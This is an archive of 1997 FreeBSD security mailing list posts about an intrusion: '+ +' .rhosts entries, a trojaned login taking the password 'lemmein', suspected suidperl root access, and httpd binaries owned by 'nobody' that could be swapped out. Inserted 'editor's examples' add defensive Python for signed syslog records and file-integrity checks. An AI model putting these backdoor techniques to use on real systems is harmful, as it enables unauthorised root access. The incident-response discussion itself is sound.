> > >Cheers, >Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ >Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] >GaiaNet Corporation - M & C Estate / / / / | / | __] ] >Beverly Hills, California USA 90210 / / / / / |/ / | __] ] >HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] > > > > From owner-freebsd-security Mon Jul 28 11:32:39 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id LAA23304 for security-outgoing; Mon, 28 Jul 1997 11:32:39 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id LAA23293 for ; Mon, 28 Jul 1997 11:32:34 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id LAA05287; Mon, 28 Jul 1997 11:31:55 -0700 (PDT) Date: Mon, 28 Jul 1997 11:31:55 -0700 (PDT) 
From: Vincent Poy To: Robert Watson cc: Guido van Rooij , loco@onyks.wszib.poznan.pl, security@FreeBSD.ORG, mario1@PrimeNet.Com, johnnyu@accessus.net Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

On Mon, 28 Jul 1997, Robert Watson wrote:

=)> > BTW, does anyone know if there is a secure logging protocol? Syslog on UDP seems a tad unreliable, not to mention opening one up from DoS. I log
=)>
=)> Not on local delivery of udp packets. Nowadays, the FreeBSD syslogd is shipped with an option -s that makes it refuse syslog messages from remote machines. This of course does not help if you want to be able to get syslog entries from a remote host. But you can refuse udp packets with destination port 513 on your routers.
=)
=)Unfortunately, I don't have the liberty of reconfiguring some of the routers my hosts are accessible through. Using ipfirewall to restrict incoming messages is possible, but undesirable as it doesn't help against spoofing, if the threat is also inside your network. The vulnerable host in the -s case is the loghost, which must accept network log messages. Configuring with a default of -s is a good arrangement.

What does the -s do anyways? I know it means secure but isn't it supposed to be secure already out of the box?
Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 11:34:20 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id LAA23451 for security-outgoing; Mon, 28 Jul 1997 11:34:20 -0700 (PDT) Received: from cyrus.watson.org (robert@cyrus.watson.org [207.86.4.20]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id LAA23426 for ; Mon, 28 Jul 1997 11:34:14 -0700 (PDT) Received: from localhost (robert@localhost) by cyrus.watson.org (8.8.5/8.8.5) with SMTP id OAA03855; Mon, 28 Jul 1997 14:33:50 -0400 (EDT) Date: Mon, 28 Jul 1997 14:33:49 -0400 (EDT) 
From: Robert Watson Reply-To: Robert Watson To: Vincent Poy cc: Tomasz Dudziak , security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

On Mon, 28 Jul 1997, Vincent Poy wrote:

> On Mon, 28 Jul 1997, Robert Watson wrote:
>
> =)> =)There was a security hole some time ago in perl that allowed local users to gain root access... That's probably the way he got root access... I would check my binaries, sup and recompile.
> =)>
> =)> Hmmm, I supped the perl from the most recent ports tree and also all the binaries are about 2 months old from the -current tree. I thought the security hole was way before that. What I didn't get is how did he get access to the second system (earth) when he doesn't have an account there in the first place?
> =)
> =)I'd be tempted to look in all the normal places -- sendmail, etc. What daemons were running on the machine? Any web server processes? Also, I'd heavily suspect that he sniffed a password if no encrypted telnet/ssh is in use.. Any use of NIS going on? Also, .rhosts arrangements can be extremely unhappy if we already know (s)he is messing with DNS entries.
>
> sendmail is running as well as apache httpd... ftpd, telnetd, and ircd. No NIS. All I know was he managed to change everyone's .rhosts file when it didn't exist originally and the contents just had:
> + +
> in it.

This guy sounds like either he has good tools, or good experience. For safety's sake, I'd guess the latter. All he needed was one sniffed password to get on the system, and then you may be stuck with known holes in application software. Most of the security problems I've seen have started with a sniffed password, but this comes from dormitory experience :).
Your best hope at this point is to shut down the system, boot on a floppy with a CDROM mounted, and then do a strategic MD5 checksum of all binaries and check for changes. If you're running STABLE, your best bet may be to sup down differences, but to reinstall the binaries necessary to support the cvsup stuff from CDROM, as well as system kernel and /bin, /sbin, etc. If he's made enough changes to zap syslog, netstat, login-stuff, I wouldn't trust any other tools on the system currently.

Robert N Watson
Junior, Logic+Computation, Carnegie Mellon University http://www.cmu.edu/
Network Security Research, Trusted Information Systems http://www.tis.com/
Network Administrator, SafePort Network Services http://www.safeport.com/
robert@fledge.watson.org rwatson@tis.com http://www.watson.org/~robert/

From owner-freebsd-security Mon Jul 28 11:44:59 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id LAA24079 for security-outgoing; Mon, 28 Jul 1997 11:44:59 -0700 (PDT) Received: from cyrus.watson.org (robert@cyrus.watson.org [207.86.4.20]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id LAA24072 for ; Mon, 28 Jul 1997 11:44:56 -0700 (PDT) Received: from localhost (robert@localhost) by cyrus.watson.org (8.8.5/8.8.5) with SMTP id OAA03882; Mon, 28 Jul 1997 14:44:30 -0400 (EDT) Date: Mon, 28 Jul 1997 14:44:30 -0400 (EDT)
From: Robert Watson Reply-To: Robert Watson To: Vincent Poy cc: Guido van Rooij , loco@onyks.wszib.poznan.pl, security@FreeBSD.ORG, mario1@PrimeNet.Com, johnnyu@accessus.net Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

On Mon, 28 Jul 1997, Vincent Poy wrote:

> On Mon, 28 Jul 1997, Robert Watson wrote:
>
> What does the -s do anyways? I know it means secure but isn't it supposed to be secure already out of the box?

-s prevents syslogd from accepting network log messages. Without it, anyone who can deliver a packet to the syslog port using UDP can add a line to your system logs. When you add entries to syslog.conf like this:

    *.error @loghost.domain

you rely on not having the -s flag set.

Allowing log messages from unauthorized hosts is a security problem, as someone can insert fictitious messages (often-times, spoofed), flood your logs, etc.

Robert N Watson
Junior, Logic+Computation, Carnegie Mellon University http://www.cmu.edu/
Network Security Research, Trusted Information Systems http://www.tis.com/
Network Administrator, SafePort Network Services http://www.safeport.com/
robert@fledge.watson.org rwatson@tis.com http://www.watson.org/~robert/

From owner-freebsd-security Mon Jul 28 12:29:55 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id MAA26473 for security-outgoing; Mon, 28 Jul 1997 12:29:55 -0700 (PDT) Received: from cyrus.watson.org (robert@cyrus.watson.org [207.86.4.20]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id MAA26460 for ; Mon, 28 Jul 1997 12:29:51 -0700 (PDT) Received: from localhost (robert@localhost) by cyrus.watson.org (8.8.5/8.8.5) with SMTP id PAA03977; Mon, 28 Jul 1997 15:29:44 -0400 (EDT) Date: Mon, 28 Jul 1997 15:29:43 -0400 (EDT)
From: Robert Watson Reply-To: Robert Watson To: security@FreeBSD.ORG cc: Adam Shostack , "Rodney W. Grimes" , dholland@eecs.harvard.edu Subject: Re: secure logging (was: Re: security hole in FreeBSD) In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

On Mon, 28 Jul 1997, Robert Watson wrote:

> Perhaps we should add another field that has bits to define the requirement that a given log message be transmitted using authenticity, confidentiality, and whether it is worth being stored. In any situation where there was significant doubt, the message would be discarded for security reasons, or logged locally and a message passed later to indicate the problem. Also, should authenticity be against a global name space (DNSsec), and then permission to store messages from a given identity be defined against that name space, or should it be for transaction-level only? I'd almost be tempted to define a wrapper packaging for syslog messages like so:
>
>     u_int16_t sl_flags
>     u_int8_t  sl_prot_type
>     u_int8_t  sl_entity_len
>     u_int8_t  sl_entity[]
>     u_int32_t sl_timesigned
>     u_int16_t sl_type
>     u_int16_t sl_priority
>     u_int16_t sl_msglen
>     u_int8_t  sl_message[]
>     u_int8_t  sl_signature_len
>     u_int8_t  sl_signature[]
>
> Where the signature is over all values present except for the signature+length itself. Type of protection used would be in the protection type field. This would allow storage of complete log entry entities, including the signing identity, signature that proves it signed the data, priority, etc. This would not provide for guaranteed delivery -- that would be the responsibility of the transport mechanism used by syslog. This could actually be the stored log entry used on syslog servers. To prevent replay (if not provided by the transport), perhaps a sl_log_id (u_int16_t?) could be provided, which would also indicate jumps in the sequence, etc.

Having thought about this a little more, I'd be tempted to go for a more variable data section to this. Probably in the form of a u_int8_t num_records variable, and then a number of strings representing those records, each with variable length. Also, possibly priority. Clustering similar log messages for the sake of reducing transmissions and number of signing operations is probably a good idea, but retaining order is important too. Has anyone looked statistically at the distribution of log messages on a standard web server or user server (whatever that means?) to see whether messages cluster by source, priority, type, etc?

Is there any consensus on the use of DNSsec in the network community, as it has not yet been made widely available (or at least, it is available, but not largely used.) The key namespace here could be used however one desired, not necessarily in a DNS-style way. The entity-name, whatever that is, simply suggests which key/algorithm should be used; a server could be configured to pull that information from DNSsec, or from an internal key-file (or both.)

Also, if we make a move to TCP, how should connection-management be worked? Presumably, one must make a connection fairly quickly on receiving to send, assuming that it passes any local authenticity requirements (e.g., a log-message must come from a key in *.my.domain to be forwarded), and then put in a queue for delivery when the transport is available. If the TCP connection is already open, and a new message doesn't arrive quickly, it should be delivered. If the TCP connection is not open, then the forwarder (or source) should wait for a certain time-out (something short) for more messages, or until the queue reaches a threshold before opening the connection. Some delay is acceptable in log delivery, I think, but not too much.

Opening the connection will involve a delay -- a T/TCP startup is probably a good idea, as data is immediately ready to send when the connection is opened, or it would not be opening. An ACK message has already been stated as desirable -- would a simple signature over the last packet (or header + signature) using the shared secret, entity public key, or whatever, back on the TCP connection suffice? Maybe something lighter-weight?

Robert N Watson
Junior, Logic+Computation, Carnegie Mellon University http://www.cmu.edu/
Network Security Research, Trusted Information Systems http://www.tis.com/
Network Administrator, SafePort Network Services http://www.safeport.com/
robert@fledge.watson.org rwatson@tis.com http://www.watson.org/~robert/

From owner-freebsd-security Mon Jul 28 12:29:56 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id MAA26482 for security-outgoing; Mon, 28 Jul 1997 12:29:56 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id MAA26466 for ; Mon, 28 Jul 1997 12:29:53 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id MAA05613; Mon, 28 Jul 1997 12:29:44 -0700 (PDT) Date: Mon, 28 Jul 1997 12:29:43 -0700 (PDT)
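[Editor's added example, placed after Robert Watson's secure-logging message above. This is not code from the thread or from FreeBSD's syslogd; it packs and verifies a log record with the field list he proposes, so the replay and gap detection he asks about can be seen working. Assumptions not in the original: HMAC-SHA256 in place of the MD5-based signature he mentions, big-endian fixed-width fields, a u16 sl_log_id placed right after sl_flags, and a Python dict standing in for the DNSsec or key-file lookup of the signing entity.]

```python
# Added example (not code from this thread or from FreeBSD's syslogd): the
# signed log-record framing proposed above, packed and verified.
# Assumptions not in the original: HMAC-SHA256 instead of MD5, big-endian
# fixed-width fields, sl_log_id as a u16 right after sl_flags, and a dict
# standing in for the DNSsec/key-file entity lookup.
import hashlib
import hmac
import struct
import time

PROT_HMAC_SHA256 = 1  # assumed value for sl_prot_type

# entity name -> shared secret (constructed for this example)
KEYS = {b"web1.example.org": b"constructed-shared-secret-for-web1"}


def pack_record(entity, key, log_id, rec_type, priority, message,
                timesigned=None, flags=0):
    """Serialize one entry; the HMAC covers every byte before sl_signature_len."""
    if timesigned is None:
        timesigned = int(time.time())
    body = struct.pack("!HHB", flags, log_id, PROT_HMAC_SHA256)  # sl_flags, sl_log_id, sl_prot_type
    body += struct.pack("!B", len(entity)) + entity              # sl_entity_len, sl_entity
    body += struct.pack("!IHHH", timesigned, rec_type, priority, len(message))
    body += message                                              # sl_message
    sig = hmac.new(key, body, hashlib.sha256).digest()
    return body + struct.pack("!B", len(sig)) + sig              # sl_signature_len, sl_signature


class Verifier:
    """Receiver side: key lookup by entity, signature check, clock-skew check,
    and per-entity sequence tracking so replays and gaps are visible."""

    def __init__(self, keys, max_skew=300):
        self.keys = keys
        self.max_skew = max_skew
        self.last_id = {}  # entity -> last accepted sl_log_id

    def verify(self, record, now=None):
        """Return (status, fields); status is 'ok', 'gap' or a rejection reason."""
        try:
            flags, log_id, prot = struct.unpack_from("!HHB", record, 0)
            off = 5
            elen = record[off]
            off += 1
            entity = record[off:off + elen]
            off += elen
            ts, rec_type, priority, mlen = struct.unpack_from("!IHHH", record, off)
            off += 10
            message = record[off:off + mlen]
            off += mlen
            body_end = off
            slen = record[off]
            off += 1
            sig = record[off:off + slen]
        except (struct.error, IndexError):
            return ("truncated", None)
        if off + slen != len(record) or len(entity) != elen or len(message) != mlen:
            return ("truncated", None)
        key = self.keys.get(entity)
        if key is None or prot != PROT_HMAC_SHA256:
            return ("unknown_entity", None)
        expected = hmac.new(key, record[:body_end], hashlib.sha256).digest()
        if not hmac.compare_digest(sig, expected):  # constant-time compare
            return ("bad_signature", None)
        now = time.time() if now is None else now
        if abs(now - ts) > self.max_skew:
            return ("stale", None)
        parsed = {"flags": flags, "log_id": log_id, "entity": entity,
                  "timesigned": ts, "type": rec_type, "priority": priority,
                  "message": message}
        last = self.last_id.get(entity)
        if last is not None and log_id <= last:  # u16 wraparound is not handled here
            return ("replay", parsed)
        status = "ok" if last is None or log_id == last + 1 else "gap"
        self.last_id[entity] = log_id
        return (status, parsed)
```

The receiver checks the signature before it looks at the sequence number, so a forged or corrupted record can never advance `last_id`; a genuine record that arrives twice is reported as a replay, and a jump in sl_log_id is reported as a gap rather than silently accepted, which is the "indicate jumps in the sequence" behaviour the message asks for.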
From: Vincent Poy To: David Langford cc: security@FreeBSD.ORG, mario1@PrimeNet.Com, johnnyu@accessus.net Subject: Re: security hole in FreeBSD In-Reply-To: <199707281830.IAA15209@caliban.dihelix.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

On Mon, 28 Jul 1997, David Langford wrote:

=)I recently caught a breakin fairly similar. The perp replaced /bin/login with one that would let them login to ANY account with a password of "lemmein". The login would NOT be logged and so it was very difficult to tell what was going on.

Hmmm, I can understand this can be done if the user had access to the system in the first place, which he did on the mercury machine, but how did he do it on the earth machine?

=)My only guess is that they used the old suidperl hack to get root. Supposedly this doesn't work on newer perl though.

I supped the latest ports tree, built and installed perl5.00401 and sperl5.00401 and deleted the perl5.003 and sperl5.003 in /usr/local/bin so it wasn't the old version of perl.

=)My suggestion to you would be to get a clean source tree, recompile everything and install tripwire.

I'll do that as soon as the machine comes back up. I heard that suid programs can be a problem too but which ones are required to be suid?
Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 12:38:57 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id MAA27066 for security-outgoing; Mon, 28 Jul 1997 12:38:57 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id MAA27061 for ; Mon, 28 Jul 1997 12:38:55 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id MAA05662; Mon, 28 Jul 1997 12:38:36 -0700 (PDT) Date: Mon, 28 Jul 1997 12:38:35 -0700 (PDT) 
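[Editor's added example, placed after Vincent Poy's reply to David Langford above. It is not code from the thread, from FreeBSD or from tripwire; it shows the baseline-and-compare check that David Langford (tripwire) and Robert Watson (MD5 checksums of all binaries from a clean boot) recommend, extended with the two things this thread kept tripping over: a setuid binary that was not in the baseline, and a .rhosts or hosts.equiv file carrying a "+" wildcard. The file tree, its contents and the intrusion steps in demo() are constructed for the example; SHA-256 is used in place of the MD5 the thread mentions. The caveat from the thread still holds: the baseline and the interpreter running this must come from trusted media, because a trojaned kernel or Python cannot be trusted to report on itself.]

```python
# Added example (not tripwire, not FreeBSD code): file-integrity baseline,
# comparison, new-setuid detection and .rhosts wildcard check.
# Everything under demo() is a constructed scenario; SHA-256 replaces MD5.
import hashlib
import os
import stat
import tempfile


def sha256_file(path):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root):
    """relative path -> (sha256, permission bits, uid, gid) for every regular file."""
    manifest = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if not stat.S_ISREG(st.st_mode):  # symlinks, devices are not hashed
                continue
            rel = os.path.relpath(full, root)
            manifest[rel] = (sha256_file(full), stat.S_IMODE(st.st_mode), st.st_uid, st.st_gid)
    return manifest


def compare(baseline, current):
    """Diff two manifests; a hash, mode or ownership change all count as modified."""
    report = {"modified": [], "added": [], "removed": [], "new_setuid": []}
    suid_bits = stat.S_ISUID | stat.S_ISGID
    for rel, entry in current.items():
        old = baseline.get(rel)
        if old is None:
            report["added"].append(rel)
        elif old != entry:
            report["modified"].append(rel)
        old_mode = old[1] if old else 0
        if (entry[1] & suid_bits) and not (old_mode & suid_bits):
            report["new_setuid"].append(rel)  # setuid/setgid that the baseline never had
    report["removed"] = [rel for rel in baseline if rel not in current]
    for key in report:
        report[key].sort()
    return report


def rhosts_wildcards(root):
    """.rhosts / hosts.equiv files with a '+' field: trust any host (or any user)."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name not in (".rhosts", "hosts.equiv"):
                continue
            full = os.path.join(dirpath, name)
            with open(full, "r", errors="replace") as f:
                if any("+" in line.split() for line in f):
                    hits.append(os.path.relpath(full, root))
    return sorted(hits)


def demo():
    """Constructed scenario: baseline a tiny tree, replay the intrusion described above."""
    with tempfile.TemporaryDirectory() as root:
        def write(rel, data, mode=0o755):
            full = os.path.join(root, rel)
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as f:
                f.write(data)
            os.chmod(full, mode)

        write("bin/login", b"original login binary")
        write("bin/netstat", b"original netstat")
        write("usr/bin/passwd", b"passwd", 0o4755)       # legitimately setuid in the baseline
        write("home/alice/.profile", b"# profile\n", 0o644)
        baseline = build_manifest(root)

        # the attacker's moves, as reported in the thread
        write("bin/login", b"trojaned login, password lemmein")
        os.rename(os.path.join(root, "bin/netstat"), os.path.join(root, "bin/.ns"))
        write("tmp/.x/sh", b"root shell", 0o4755)
        write("home/alice/.rhosts", b"+ +\n", 0o644)

        report = compare(baseline, build_manifest(root))
        report["rhosts_wildcards"] = rhosts_wildcards(root)
        return report


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

In practice the baseline is written once from known-good media and kept off the host; the comparison then runs from a clean boot, exactly as Robert Watson suggests, so that a replaced netstat, login or syslogd cannot hide the comparison from itself.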
From: Vincent Poy To: Robert Watson cc: Tomasz Dudziak , security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

On Mon, 28 Jul 1997, Robert Watson wrote:

=)> =)I'd be tempted to look in all the normal places -- sendmail, etc. What daemons were running on the machine? Any web server processes? Also, I'd heavily suspect that he sniffed a password if no encrypted telnet/ssh is in use.. Any use of NIS going on? Also, .rhosts arrangements can be extremely unhappy if we already know (s)he is messing with DNS entries.
=)>
=)> sendmail is running as well as apache httpd... ftpd, telnetd, and ircd. No NIS. All I know was he managed to change everyone's .rhosts file when it didn't exist originally and the contents just had:
=)> + +
=)> in it.
=)
=)This guy sounds like either he has good tools, or good experience. For safety's sake, I'd guess the latter. All he needed was one sniffed password to get on the system, and then you may be stuck with known holes in application software. Most of the security problems I've seen have started with a sniffed password, but this comes from dormitory experience :).

Yep, sniffing would work but can they actually sniff outside of the network?

=)Your best hope at this point is to shut down the system, boot on a floppy with a CDROM mounted, and then do a strategic MD5 checksum of all binaries and check for changes. If you're running STABLE, your best bet may be to sup down differences, but to reinstall the binaries necessary to support the cvsup stuff from CDROM, as well as system kernel and /bin, /sbin, etc. If he's made enough changes to zap syslog, netstat, login-stuff, I wouldn't trust any other tools on the system currently.

Not even a rebuild of -current after cvs?
Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 12:49:13 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id MAA27688 for security-outgoing; Mon, 28 Jul 1997 12:49:13 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id MAA27683 for ; Mon, 28 Jul 1997 12:49:11 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id MAA05729; Mon, 28 Jul 1997 12:49:01 -0700 (PDT) Date: Mon, 28 Jul 1997 12:49:00 -0700 (PDT) 
From: Vincent Poy To: Ollivier Robert cc: security@FreeBSD.ORG, JbHunt , "[Mario1-]" Subject: Re: security hole in FreeBSD In-Reply-To: <19970728171633.10794@keltia.freenix.fr> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

On Mon, 28 Jul 1997, Ollivier Robert wrote:

=)According to Vincent Poy:
=)> 1) User on mercury machine complained about perl5 not working which was perl5.003 since libmalloc lib it was linked to was missing.
=)> 2) I recompiled the perl5 port from the ports tree and it's perl5.00403 and it works.
=)
=)I don't think he used perl to hack root unless you kept old versions of Perl4 and Perl5. The buffer overflows in Perl4 were plugged in May by Werner. 5.003+ holes are fixed in 5.004 and later.

Nope, when I added perl5 yesterday from the ports tree, I deleted the perl5.003 and sperl5.003 that was there after it got updated to perl5.00401 and sperl5.00401. Is the /usr/bin/perl vulnerable in any way?

=)> 6) We went to inetd.conf and shut off all daemons except telnetd and rebooted and user still can get onto the machine invisibly.
=)
=)That shows that he has used a spare port to hook a root shell on. In this case, "netstat -a" or "lsof -i:TCP" will give you all connections, including those on which a program is LISTENing. That way you'll catch any process left on a port.

True, but netstat wasn't working anymore after we kicked him off the first time and rejected all packets from his ip # when he came back on.
Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____] From owner-freebsd-security Mon Jul 28 12:52:10 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id MAA27954 for security-outgoing; Mon, 28 Jul 1997 12:52:10 -0700 (PDT) Received: from netrail.net (netrail.net [205.215.10.3]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id MAA27938 for ; Mon, 28 Jul 1997 12:52:06 -0700 (PDT) Received: from localhost (jonz@localhost) by netrail.net (8.8.6/8.8.6) with SMTP id PAA12711; Mon, 28 Jul 1997 15:50:44 GMT Date: Mon, 28 Jul 1997 15:50:44 +0000 (GMT) 
From: "Jonathan A. Zdziarski" To: Robert Watson cc: Vincent Poy , Tomasz Dudziak , security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

There IS one common hole I've seen apache and stronghold have, and that is that some people like to leave their sessiond or httpd files owned by 'nobody'. This allows somebody running CGI on that system to replace those binaries with their own, hacked binaries (since the scripts usually run as nobody), and the next time httpd starts, they can make it write a root shell, or just about anything along those lines.

-------------------------------------------------------------------------
Jonathan A. Zdziarski NetRail Incorporated
Server Engineering Manager 230 Peachtree St. Suite 500
jonz@netrail.net Atlanta, GA 30303
http://www.netrail.net (888) - NETRAIL
-------------------------------------------------------------------------

On Mon, 28 Jul 1997, Robert Watson wrote:

:On Mon, 28 Jul 1997, Vincent Poy wrote:
:
:> On Mon, 28 Jul 1997, Robert Watson wrote:
:>
:> =)> =)There was a security hole some time ago in perl that allowed local users to gain root access... That's probably the way he got root access... I would check my binaries, sup and recompile.
:> =)>
:> =)> Hmmm, I supped the perl from the most recent ports tree and also all the binaries are about 2 months old from the -current tree. I thought the security hole was way before that. What I didn't get is how did he get access to the second system (earth) when he doesn't have an account there in the first place?
:> =)
:> =)I'd be tempted to look in all the normal places -- sendmail, etc. What daemons were running on the machine? Any web server processes? Also, I'd heavily suspect that he sniffed a password if no encrypted telnet/ssh is in use.. Any use of NIS going on? Also, .rhosts arrangements can be extremely unhappy if we already know (s)he is messing with DNS entries.
:>
:> sendmail is running as well as apache httpd... ftpd, telnetd, and ircd. No NIS. All I know was he managed to change everyone's .rhosts file when it didn't exist originally and the contents just had:
:> + +
:> in it.
:
:This guy sounds like either he has good tools, or good experience. For safety's sake, I'd guess the latter. All he needed was one sniffed password to get on the system, and then you may be stuck with known holes in application software. Most of the security problems I've seen have started with a sniffed password, but this comes from dormitory experience :).
:
:Your best hope at this point is to shut down the system, boot on a floppy with a CDROM mounted, and then do a strategic MD5 checksum of all binaries and check for changes. If you're running STABLE, your best bet may be to sup down differences, but to reinstall the binaries necessary to support the cvsup stuff from CDROM, as well as system kernel and /bin, /sbin, etc. If he's made enough changes to zap syslog, netstat, login-stuff, I wouldn't trust any other tools on the system currently.
:
: Robert N Watson
:
:Junior, Logic+Computation, Carnegie Mellon University http://www.cmu.edu/
:Network Security Research, Trusted Information Systems http://www.tis.com/
:Network Administrator, SafePort Network Services http://www.safeport.com/
:robert@fledge.watson.org rwatson@tis.com http://www.watson.org/~robert/
:

From owner-freebsd-security Mon Jul 28 12:52:47 1997 Return-Path: Received: (from root@localhost) by hub.freebsd.org (8.8.5/8.8.5) id MAA28019 for security-outgoing; Mon, 28 Jul 1997 12:52:47 -0700 (PDT) Received: from mail.MCESTATE.COM (vince@mail.MCESTATE.COM [207.211.200.50]) by hub.freebsd.org (8.8.5/8.8.5) with ESMTP id MAA28011 for ; Mon, 28 Jul 1997 12:52:45 -0700 (PDT) Received: from localhost (vince@localhost) by mail.MCESTATE.COM (8.8.5/8.8.5) with SMTP id MAA05771; Mon, 28 Jul 1997 12:52:40 -0700 (PDT) Date: Mon, 28 Jul 1997 12:52:39 -0700 (PDT)
From: Vincent Poy To: "Jonathan A. Zdziarski" cc: security@FreeBSD.ORG, "[Mario1-]" , JbHunt Subject: Re: security hole in bsd In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk

On Mon, 28 Jul 1997, Jonathan A. Zdziarski wrote:

=)BTW: You said you didn't know how he hacked into your other system as he doesn't have an account on it. Do you have a .rhosts file in the root directory of the other server or a hosts.equiv file allowing the two to share root/other privileged logins between the two? As root he'd be able to su to anything. How about NFS/rdist permissions?

There was no .rhosts file in root until he created it and the contents were just two +'s, which I deleted afterwards, but he still got back on. hosts.equiv is whatever FreeBSD shipped with; I never configured that file. Don't have NFS or rdist running either.

Cheers, Vince - vince@MCESTATE.COM - vince@GAIANET.NET ________ __ ____ Unix Networking Operations - FreeBSD-Real Unix for Free / / / / | / |[__ ] GaiaNet Corporation - M & C Estate / / / / | / | __] ] Beverly Hills, California USA 90210 / / / / / |/ / | __] ] HongKong Stars/Gravis UltraSound Mailing Lists Admin /_/_/_/_/|___/|_|[____]

